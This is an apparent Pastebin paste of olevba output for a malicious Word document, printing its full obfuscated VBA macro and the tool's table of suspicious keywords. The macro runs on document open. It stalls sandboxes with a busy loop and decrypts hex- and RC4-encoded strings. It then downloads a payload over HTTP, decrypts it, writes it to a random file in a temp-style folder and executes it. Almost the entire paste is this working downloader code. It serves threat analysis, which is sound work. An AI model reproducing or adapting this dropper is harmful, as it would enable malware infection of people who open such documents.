Advertisement
dynamoo

Malicious Word macro

Sep 4th, 2015
425
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MAS-HB-V teresa~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: teresa~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub UT2lVxGGeo0VLREk3(QrPZ As Long)
  16. Dim MoMo8neU As Long, Nvj9phdNJ As Long
  17. MoMo8neU = 33
  18. Nvj9phdNJ = 77
  19. If MoMo8neU + Nvj9phdNJ > 2 Then
  20. Nvj9phdNJ = MoMo8neU + 90
  21. Else
  22. InputBox 5
  23. End If
  24. Dim QsE6Qar7nhH As Long
  25. Dim NLboM As Long, Nj1pL5UNCknSLR As Long
  26. NLboM = 8
  27. Nj1pL5UNCknSLR = 26
  28. If NLboM + Nj1pL5UNCknSLR > 2 Then
  29. Nj1pL5UNCknSLR = NLboM + 27
  30. Else
  31. InputBox 23
  32. End If
  33. QsE6Qar7nhH = Timer + QrPZ
  34. Do While Timer < QsE6Qar7nhH
  35. DoEvents
  36. Loop
  37. Dim FQG3JouSEr As Long, YUG2BKERumpKmmB As Long
  38. FQG3JouSEr = 23
  39. YUG2BKERumpKmmB = 66
  40. If FQG3JouSEr + YUG2BKERumpKmmB > 2 Then
  41. YUG2BKERumpKmmB = FQG3JouSEr + 90
  42. Else
  43. InputBox 18
  44. End If
  45. End Sub
  46. Sub M9wDgoaeTX3()
  47. Dim E2UgfE As Long, UzLBYgkhB3aIOtgMP As Long
  48. E2UgfE = 64
  49. UzLBYgkhB3aIOtgMP = 69
  50. If E2UgfE + UzLBYgkhB3aIOtgMP > 2 Then
  51. UzLBYgkhB3aIOtgMP = E2UgfE + 9
  52. Else
  53. InputBox 63
  54. End If
  55. Randomize
  56. YbnZHj9 = UCase(24)
  57. GetObject 19, 7
  58. AppActivate 42
  59. NPer 36, 80, 22
  60. Beep
  61. If CDbl(69) = True Then H0lmLWD6j = 80
  62. Choose 73, XDMwILFyUiw
  63. App.LogEvent "KGxODPJl"
  64. LoadPicture 95, 2, 30, 71, 74
  65. QL27aWNmpJXYTR = DateValue(92)
  66. U7N8XjbW3GBEK = CVar(12)
  67. Atn 2
  68. Err.Clear
  69. RdIyQpxjM = CurDir
  70. If CBool(58) = True Then BcQ7IfrEWvZy = 88
  71. DateSerial 24, 63, 88
  72. Hour 68
  73. CreateObject "QRumpKmmBd", "EwcYJAOm"
  74. GrXrkiM1dcoj = Cos(10)
  75. Tan 30
  76. Load GMuy3irEDKAG7JtL
  77. Join XSo2SruPf, 47
  78. TimeValue 48
  79. ChDrive 45
  80. Reset
  81. If CDec(54) = True Then H05tV5iavWBcEMwXB = 26
  82. TimeSerial 12, 26, 84
  83. HuEEGHJbZMLi0Qxs = LCase(10)
  84. Err.Raise 8
  85. Dim NFINxTzR1CHQFlD1RA As Long, X72Yc As Long
  86. NFINxTzR1CHQFlD1RA = 2
  87. X72Yc = 20
  88. If NFINxTzR1CHQFlD1RA + X72Yc > 2 Then
  89. X72Yc = NFINxTzR1CHQFlD1RA + 65
  90. Else
  91. InputBox 55
  92. End If
  93. End Sub
  94. Sub BVYKmATY1Sk()
  95. Dim E4SYh1vU As Long, EZspzHEOl8s As Long
  96. E4SYh1vU = 70
  97. EZspzHEOl8s = 25
  98. If E4SYh1vU + EZspzHEOl8s > 2 Then
  99. EZspzHEOl8s = E4SYh1vU + 88
  100. Else
  101. InputBox 23
  102. End If
  103. Dim O5M0g298BWjPblj As String, Nom1xcv4lW As Object, ArNM As Integer
  104. Dim WrEfs1w74DROcLsM4 As Long, VT8vn8FfejF As Long
  105. WrEfs1w74DROcLsM4 = 41
  106. VT8vn8FfejF = 41
  107. If WrEfs1w74DROcLsM4 + VT8vn8FfejF > 2 Then
  108. VT8vn8FfejF = WrEfs1w74DROcLsM4 + 93
  109. Else
  110. InputBox 10
  111. End If
  112. O5M0g298BWjPblj = Environ(NzpSbnF0tTwF(LTGtLdmfe6("D106D1C992140B"), "HEnSN34d5Piya4IZ")) & "\" & K1F2Odae7gAe9kt & NzpSbnF0tTwF(LTGtLdmfe6("691E41BC"), "QlSzx68AvzvA")
  113. Dim YuhuYuNjqRXV4 As Long, Lw6ULgNCrccZjM As Long
  114. YuhuYuNjqRXV4 = 75
  115. Lw6ULgNCrccZjM = 36
  116. If YuhuYuNjqRXV4 + Lw6ULgNCrccZjM > 2 Then
  117. Lw6ULgNCrccZjM = YuhuYuNjqRXV4 + 53
  118. Else
  119. InputBox 55
  120. End If
  121. Set Nom1xcv4lW = CreateObject(NzpSbnF0tTwF(LTGtLdmfe6("D701E9FD0CDF160440C9FFD98A34539301"), "QkcJhoYEy8i"))
  122. Dim Oph6mJdmof As Long, IGd8dL2izlHD5uqk As Long
  123. Oph6mJdmof = 60
  124. IGd8dL2izlHD5uqk = 9
  125. If Oph6mJdmof + IGd8dL2izlHD5uqk > 2 Then
  126. IGd8dL2izlHD5uqk = Oph6mJdmof + 9
  127. Else
  128. InputBox 61
  129. End If
  130. Nom1xcv4lW.Open NzpSbnF0tTwF(LTGtLdmfe6("8DA4E8"), "YjdTufPN5"), NzpSbnF0tTwF(LTGtLdmfe6("5131C8C93A5EE4460AB8BCA5B14DA715AB6D37625CE5E0EE875644"), "VpNzfbLiI7"), False
  131. Dim HGYnrl3Bl As Long, HI3Cj6S2mkB As Long
  132. HGYnrl3Bl = 18
  133. HI3Cj6S2mkB = 22
  134. If HGYnrl3Bl + HI3Cj6S2mkB > 2 Then
  135. HI3Cj6S2mkB = HGYnrl3Bl + 84
  136. Else
  137. InputBox 23
  138. End If
  139. Nom1xcv4lW.setRequestHeader NzpSbnF0tTwF(LTGtLdmfe6("075429E4420C2413D960"), "HAmTOXdOf"), NzpSbnF0tTwF(LTGtLdmfe6("23954AE47F519BA1FFC5E6"), "GBQC13cQE2A7DK")
  140. Nom1xcv4lW.send
  141. If Nom1xcv4lW.readyState = 4 And Nom1xcv4lW.Status = 200 Then
  142. Dim XjtGHi3fW0vicIZ As Long, BKfl9WWEA As Long
  143. XjtGHi3fW0vicIZ = 33
  144. BKfl9WWEA = 76
  145. If XjtGHi3fW0vicIZ + BKfl9WWEA > 2 Then
  146. BKfl9WWEA = XjtGHi3fW0vicIZ + 45
  147. Else
  148. InputBox 66
  149. End If
  150. ArNM = FreeFile
  151. Open O5M0g298BWjPblj For Binary Access Write Lock Write As #ArNM
  152. Put #ArNM, , NzpSbnF0tTwF(StrConv(Nom1xcv4lW.ResponseBody, vbUnicode), NzpSbnF0tTwF(LTGtLdmfe6("8D993690AE70537D21"), "FYuo35ita"))
  153. Close #ArNM
  154. Dim Xt50fXAwn6FXjO As Long, Di7O35mQk As Long
  155. Xt50fXAwn6FXjO = 78
  156. Di7O35mQk = 66
  157. If Xt50fXAwn6FXjO + Di7O35mQk > 2 Then
  158. Di7O35mQk = Xt50fXAwn6FXjO + 2
  159. Else
  160. InputBox 95
  161. End If
  162. UT2lVxGGeo0VLREk3 1
  163. Dim HQQR56M61xE8Bw As Long, UJ9B4pUM9i As Long
  164. HQQR56M61xE8Bw = 40
  165. UJ9B4pUM9i = 30
  166. If HQQR56M61xE8Bw + UJ9B4pUM9i > 2 Then
  167. UJ9B4pUM9i = HQQR56M61xE8Bw + 86
  168. Else
  169. InputBox 17
  170. End If
  171. CreateObject(NzpSbnF0tTwF(LTGtLdmfe6("149590C94E324D290204D30151"), "MaCO2o86")).exec """" & O5M0g298BWjPblj & """"
  172. Dim Cn7M6vz35mQk As Long, HsDN As Long
  173. Cn7M6vz35mQk = 8
  174. HsDN = 26
  175. If Cn7M6vz35mQk + HsDN > 2 Then
  176. HsDN = Cn7M6vz35mQk + 71
  177. Else
  178. InputBox 61
  179. End If
  180. End If
  181. Dim RIsovz3m57p94 As Long, Eiw0Jpze As Long
  182. RIsovz3m57p94 = 44
  183. Eiw0Jpze = 56
  184. If RIsovz3m57p94 + Eiw0Jpze > 2 Then
  185. Eiw0Jpze = RIsovz3m57p94 + 92
  186. Else
  187. InputBox 9
  188. End If
  189. Set Nom1xcv4lW = Nothing
  190. Dim BlKQtk5FLVFq37q3m As Long, OWLpMWDgpCK As Long
  191. BlKQtk5FLVFq37q3m = 31
  192. OWLpMWDgpCK = 49
  193. If BlKQtk5FLVFq37q3m + OWLpMWDgpCK > 2 Then
  194. OWLpMWDgpCK = BlKQtk5FLVFq37q3m + 68
  195. Else
  196. InputBox 58
  197. End If
  198. End Sub
  199. Function LTGtLdmfe6(WLmggEu4wPuCf6U As String) As String
  200. Dim PpZWiw1uZdc As Long, JcyMl8jUXzYzWowW7 As Long
  201. PpZWiw1uZdc = 94
  202. JcyMl8jUXzYzWowW7 = 6
  203. If PpZWiw1uZdc + JcyMl8jUXzYzWowW7 > 2 Then
  204. JcyMl8jUXzYzWowW7 = PpZWiw1uZdc + 97
  205. Else
  206. InputBox 21
  207. End If
  208. Dim DuWXgdp27trqD As Integer
  209. Dim GeNmc As Long, UjU1G As Long
  210. GeNmc = 87
  211. UjU1G = 25
  212. If GeNmc + UjU1G > 2 Then
  213. UjU1G = GeNmc + 40
  214. Else
  215. InputBox 20
  216. End If
  217. For DuWXgdp27trqD = 1 To Len(WLmggEu4wPuCf6U) Step 2
  218. LTGtLdmfe6 = LTGtLdmfe6 & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(WLmggEu4wPuCf6U, DuWXgdp27trqD, 2)))
  219. Next
  220. Dim QlSBJGU0f As Long, CQHhnogE77d As Long
  221. QlSBJGU0f = 69
  222. CQHhnogE77d = 19
  223. If QlSBJGU0f + CQHhnogE77d > 2 Then
  224. CQHhnogE77d = QlSBJGU0f + 69
  225. Else
  226. InputBox 91
  227. End If
  228. End Function
  229. Function NzpSbnF0tTwF(ByVal Y1ixbJD4zEeQf8L As String, ByVal DHMGldOlgx As String) As String
  230. Dim Nizo32MUrfyUV0G As Long, Tdsrl8orbChF As Long
  231. Nizo32MUrfyUV0G = 32
  232. Tdsrl8orbChF = 31
  233. If Nizo32MUrfyUV0G + Tdsrl8orbChF > 2 Then
  234. Tdsrl8orbChF = Nizo32MUrfyUV0G + 7
  235. Else
  236. InputBox 80
  237. End If
  238. On Error Resume Next
  239. Dim GcSHynE9wAXP As Long, SbLlS As Long
  240. GcSHynE9wAXP = 79
  241. SbLlS = 15
  242. If GcSHynE9wAXP + SbLlS > 2 Then
  243. SbLlS = GcSHynE9wAXP + 82
  244. Else
  245. InputBox 26
  246. End If
  247. Dim MiUfmjWsY(0 To 255) As Integer, MutSZPKUlLX As Long, QnU6ilN As Long, WRY09SnfNN As Long, PqeMkDOpXZU1Fo() As Byte, Je11ZTWenE() As Byte, VVAjjMRYZ As Byte
  248. Dim XLirfX As Long, EahZ2OFGnyc As Long
  249. XLirfX = 91
  250. EahZ2OFGnyc = 25
  251. If XLirfX + EahZ2OFGnyc > 2 Then
  252. EahZ2OFGnyc = XLirfX + 97
  253. Else
  254. InputBox 6
  255. End If
  256. PqeMkDOpXZU1Fo() = StrConv(DHMGldOlgx, vbFromUnicode)
  257. Dim AJnT9PXLP2Y00 As Long, IcUdwApr As Long
  258. AJnT9PXLP2Y00 = 22
  259. IcUdwApr = 60
  260. If AJnT9PXLP2Y00 + IcUdwApr > 2 Then
  261. IcUdwApr = AJnT9PXLP2Y00 + 20
  262. Else
  263. InputBox 66
  264. End If
  265. For MutSZPKUlLX = 0 To 255
  266. MiUfmjWsY(MutSZPKUlLX) = MutSZPKUlLX
  267. Next MutSZPKUlLX
  268. MutSZPKUlLX = 0
  269. QnU6ilN = 0
  270. WRY09SnfNN = 0
  271. For MutSZPKUlLX = 0 To 255
  272. QnU6ilN = (QnU6ilN + MiUfmjWsY(MutSZPKUlLX) + PqeMkDOpXZU1Fo(MutSZPKUlLX Mod Len(DHMGldOlgx))) Mod 256
  273. VVAjjMRYZ = MiUfmjWsY(MutSZPKUlLX)
  274. MiUfmjWsY(MutSZPKUlLX) = MiUfmjWsY(QnU6ilN)
  275. MiUfmjWsY(QnU6ilN) = VVAjjMRYZ
  276. Next MutSZPKUlLX
  277. MutSZPKUlLX = 0
  278. QnU6ilN = 0
  279. WRY09SnfNN = 0
  280. Je11ZTWenE() = StrConv(Y1ixbJD4zEeQf8L, vbFromUnicode)
  281. For MutSZPKUlLX = 0 To Len(Y1ixbJD4zEeQf8L)
  282. QnU6ilN = (QnU6ilN + 1) Mod 256
  283. WRY09SnfNN = (WRY09SnfNN + MiUfmjWsY(QnU6ilN)) Mod 256
  284. VVAjjMRYZ = MiUfmjWsY(QnU6ilN)
  285. MiUfmjWsY(QnU6ilN) = MiUfmjWsY(WRY09SnfNN)
  286. MiUfmjWsY(WRY09SnfNN) = VVAjjMRYZ
  287. Je11ZTWenE(MutSZPKUlLX) = Je11ZTWenE(MutSZPKUlLX) Xor (MiUfmjWsY((MiUfmjWsY(QnU6ilN) + MiUfmjWsY(WRY09SnfNN)) Mod 256))
  288. Next MutSZPKUlLX
  289. Dim XPWzrQQmzax0Nr2 As Long, YXSLVumtVMR As Long
  290. XPWzrQQmzax0Nr2 = 87
  291. YXSLVumtVMR = 38
  292. If XPWzrQQmzax0Nr2 + YXSLVumtVMR > 2 Then
  293. YXSLVumtVMR = XPWzrQQmzax0Nr2 + 59
  294. Else
  295. InputBox 48
  296. End If
  297. NzpSbnF0tTwF = StrConv(Je11ZTWenE, vbUnicode)
  298. Dim Y7e4BKmxSnVe7v As Long, UZsXIQlqgYZyWc As Long
  299. Y7e4BKmxSnVe7v = 84
  300. UZsXIQlqgYZyWc = 32
  301. If Y7e4BKmxSnVe7v + UZsXIQlqgYZyWc > 2 Then
  302. UZsXIQlqgYZyWc = Y7e4BKmxSnVe7v + 43
  303. Else
  304. InputBox 36
  305. End If
  306. End Function
  307. Function K1F2Odae7gAe9kt() As String
  308. Dim CMVVBHyfHWhPg3 As Long, OCWte48zp As Long
  309. CMVVBHyfHWhPg3 = 50
  310. OCWte48zp = 62
  311. If CMVVBHyfHWhPg3 + OCWte48zp > 2 Then
  312. OCWte48zp = CMVVBHyfHWhPg3 + 15
  313. Else
  314. InputBox 94
  315. End If
  316. Dim IATxzRn8() As Byte, GKai3S0NCvRE() As Byte, JITwm As Long, PqPZNDOPgVmwy3853 As Long, KemFwF As String, EamvkGeI As String, OGE As Long
  317. Dim OIOXts51Vm As Long, HKswmgVLaqN5VF As Long
  318. OIOXts51Vm = 64
  319. HKswmgVLaqN5VF = 21
  320. If OIOXts51Vm + HKswmgVLaqN5VF > 2 Then
  321. HKswmgVLaqN5VF = OIOXts51Vm + 51
  322. Else
  323. InputBox 86
  324. End If
  325. OGE = 0
  326. Dim ClUrM As Long, Wzpd0e As Long
  327. ClUrM = 35
  328. Wzpd0e = 34
  329. If ClUrM + Wzpd0e > 2 Then
  330. Wzpd0e = ClUrM + 64
  331. Else
  332. InputBox 45
  333. End If
  334. QE5ziR0nvOIj:
  335. Dim WLlnFsz4vWSrlhA As Long, De5TuiBlhp6 As Long
  336. WLlnFsz4vWSrlhA = 37
  337. De5TuiBlhp6 = 55
  338. If WLlnFsz4vWSrlhA + De5TuiBlhp6 > 2 Then
  339. De5TuiBlhp6 = WLlnFsz4vWSrlhA + 74
  340. Else
  341. InputBox 64
  342. End If
  343. Randomize
  344. EamvkGeI = Int(30 * Rnd)
  345. If EamvkGeI < 4 Then GoTo QE5ziR0nvOIj
  346. OGE = EamvkGeI
  347. If OGE > 0& Then
  348. Dim VhasnVva As Long, Si7fxKOu As Long
  349. VhasnVva = 28
  350. Si7fxKOu = 56
  351. If VhasnVva + Si7fxKOu > 2 Then
  352. Si7fxKOu = VhasnVva + 71
  353. Else
  354. InputBox 73
  355. End If
  356. KemFwF = NzpSbnF0tTwF(LTGtLdmfe6("DAF84007EA153A26C441"), "U7PvLfiT0a")
  357. Randomize
  358. IATxzRn8 = KemFwF
  359. JITwm = Len(KemFwF) - 1&
  360. OGE = (OGE * 2&) - 1&
  361. ReDim GKai3S0NCvRE(OGE) As Byte
  362. Dim B9vvkh As Long, JCIknOdKeNIOXts As Long
  363. B9vvkh = 59
  364. JCIknOdKeNIOXts = 9
  365. If B9vvkh + JCIknOdKeNIOXts > 2 Then
  366. JCIknOdKeNIOXts = B9vvkh + 86
  367. Else
  368. InputBox 81
  369. End If
  370. For PqPZNDOPgVmwy3853 = 0& To OGE Step 2&
  371. GKai3S0NCvRE(PqPZNDOPgVmwy3853) = IATxzRn8(CLng(JITwm * Rnd) * 2&)
  372. Next
  373. Dim UVXRVjPm6 As Long, Ovnb2Q7Z3n As Long
  374. UVXRVjPm6 = 44
  375. Ovnb2Q7Z3n = 81
  376. If UVXRVjPm6 + Ovnb2Q7Z3n > 2 Then
  377. Ovnb2Q7Z3n = UVXRVjPm6 + 42
  378. Else
  379. InputBox 87
  380. End If
  381. End If
  382. Dim QmIOXts As Long, HcNaiWCJ3u2h0va As Long
  383. QmIOXts = 55
  384. HcNaiWCJ3u2h0va = 74
  385. If QmIOXts + HcNaiWCJ3u2h0va > 2 Then
  386. HcNaiWCJ3u2h0va = QmIOXts + 64
  387. Else
  388. InputBox 21
  389. End If
  390. K1F2Odae7gAe9kt = GKai3S0NCvRE
  391. Dim PP0YbIPC As Long, U9BHm As Long
  392. PP0YbIPC = 53
  393. U9BHm = 65
  394. If PP0YbIPC + U9BHm > 2 Then
  395. U9BHm = PP0YbIPC + 57
  396. Else
  397. InputBox 79
  398. End If
  399. End Function
  400. Sub Document_Open()
  401. Dim TJ3u2h0va8JQL As Long, SvwNI1suwap As Long
  402. TJ3u2h0va8JQL = 69
  403. SvwNI1suwap = 44
  404. If TJ3u2h0va8JQL + SvwNI1suwap > 2 Then
  405. SvwNI1suwap = TJ3u2h0va8JQL + 18
  406. Else
  407. InputBox 70
  408. End If
  409. Dim HcAhnmMRBmS8RD As Long, L8534ZR0Bf7F As Long, Hm2K1DxRPD5MnwXP As Long
  410. Dim YHQMd6XbTCJPKh7U As Long, PmbVJL3P8 As Long
  411. YHQMd6XbTCJPKh7U = 20
  412. PmbVJL3P8 = 91
  413. If YHQMd6XbTCJPKh7U + PmbVJL3P8 > 2 Then
  414. PmbVJL3P8 = YHQMd6XbTCJPKh7U + 23
  415. Else
  416. InputBox 30
  417. End If
  418. HcAhnmMRBmS8RD = 994673558: L8534ZR0Bf7F = 0: Hm2K1DxRPD5MnwXP = 0
  419. Dim R52Wk4 As Long, FgxohIdODXUl As Long
  420. R52Wk4 = 93
  421. FgxohIdODXUl = 98
  422. If R52Wk4 + FgxohIdODXUl > 2 Then
  423. FgxohIdODXUl = R52Wk4 + 82
  424. Else
  425. InputBox 31
  426. End If
  427. For L8534ZR0Bf7F = 1 To HcAhnmMRBmS8RD
  428. Hm2K1DxRPD5MnwXP = Hm2K1DxRPD5MnwXP + 1
  429. Next L8534ZR0Bf7F
  430. Dim Dwa7rYDIE7 As Long, EK1k5i29Ujcmn As Long
  431. Dwa7rYDIE7 = 54
  432. EK1k5i29Ujcmn = 61
  433. If Dwa7rYDIE7 + EK1k5i29Ujcmn > 2 Then
  434. EK1k5i29Ujcmn = Dwa7rYDIE7 + 67
  435. Else
  436. InputBox 51
  437. End If
  438. If Hm2K1DxRPD5MnwXP = HcAhnmMRBmS8RD Then
  439. Dim DrRtM8FRTg As Long, IUKdCGHG As Long
  440. DrRtM8FRTg = 73
  441. IUKdCGHG = 43
  442. If DrRtM8FRTg + IUKdCGHG > 2 Then
  443. IUKdCGHG = DrRtM8FRTg + 8
  444. Else
  445. InputBox 13
  446. End If
  447. BVYKmATY1Sk
  448. Dim WnCmXvJP As Long, DcJ9IiBo As Long
  449. WnCmXvJP = 68
  450. DcJ9IiBo = 59
  451. If WnCmXvJP + DcJ9IiBo > 2 Then
  452. DcJ9IiBo = WnCmXvJP + 60
  453. Else
  454. InputBox 57
  455. End If
  456. Else
  457. Dim OfovYqeX As Long, SFrRtM8F As Long
  458. OfovYqeX = 87
  459. SFrRtM8F = 2
  460. If OfovYqeX + SFrRtM8F > 2 Then
  461. SFrRtM8F = OfovYqeX + 59
  462. Else
  463. InputBox 84
  464. End If
  465. M9wDgoaeTX3
  466. Dim LJlLm5mdEmX1Tr As Long, SHGwuHorf6WS As Long
  467. LJlLm5mdEmX1Tr = 58
  468. SHGwuHorf6WS = 63
  469. If LJlLm5mdEmX1Tr + SHGwuHorf6WS > 2 Then
  470. SHGwuHorf6WS = LJlLm5mdEmX1Tr + 47
  471. Else
  472. InputBox 95
  473. End If
  474. End If
  475. Dim BwIYbweknM As Long, EeqjPJFeOUgLXY As Long
  476. BwIYbweknM = 19
  477. EeqjPJFeOUgLXY = 9
  478. If BwIYbweknM + EeqjPJFeOUgLXY > 2 Then
  479. EeqjPJFeOUgLXY = BwIYbweknM + 65
  480. Else
  481. InputBox 68
  482. End If
  483. End Sub
  484.  
  485. +------------+----------------------+-----------------------------------------+
  486. | Type       | Keyword              | Description                             |
  487. +------------+----------------------+-----------------------------------------+
  488. | AutoExec   | Document_Open        | Runs when the Word document is opened   |
  489. | Suspicious | Open                 | May open a file                         |
  490. | Suspicious | Binary               | May read or write a binary file (if     |
  491. |            |                      | combined with Open)                     |
  492. | Suspicious | CreateObject         | May create an OLE object                |
  493. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  494. |            |                      | strings                                 |
  495. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  496. |            |                      | strings                                 |
  497. | Suspicious | Environ              | May read system environment variables   |
  498. | Suspicious | Write                | May write to a file (if combined with   |
  499. |            |                      | Open)                                   |
  500. | Suspicious | Put                  | May write to a file (if combined with   |
  501. |            |                      | Open)                                   |
  502. | Suspicious | AppActivate          | May control another application by      |
  503. |            |                      | simulating user keystrokes              |
  504. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  505. |            |                      | be used to obfuscate strings (option    |
  506. |            |                      | --decode to see all)                    |
  507. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  508. |            |                      | may be used to obfuscate strings        |
  509. |            |                      | (option --decode to see all)            |
  510. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  511. |            | Strings              | may be used to obfuscate strings        |
  512. |            |                      | (option --decode to see all)            |
  513. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement